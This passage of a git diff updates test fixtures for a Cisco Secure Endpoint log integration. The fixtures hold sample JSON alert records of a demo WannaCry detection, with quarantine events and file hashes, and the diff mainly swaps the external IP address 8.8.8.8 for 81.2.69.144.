"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010936Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -5051,7 +5051,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5092,7 +5092,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5102,8 +5102,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798790467Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010940500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -5123,7 +5123,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log index 6ccff00d38b..da5ec2ad9db 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log @@ -1,53 +1,53 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 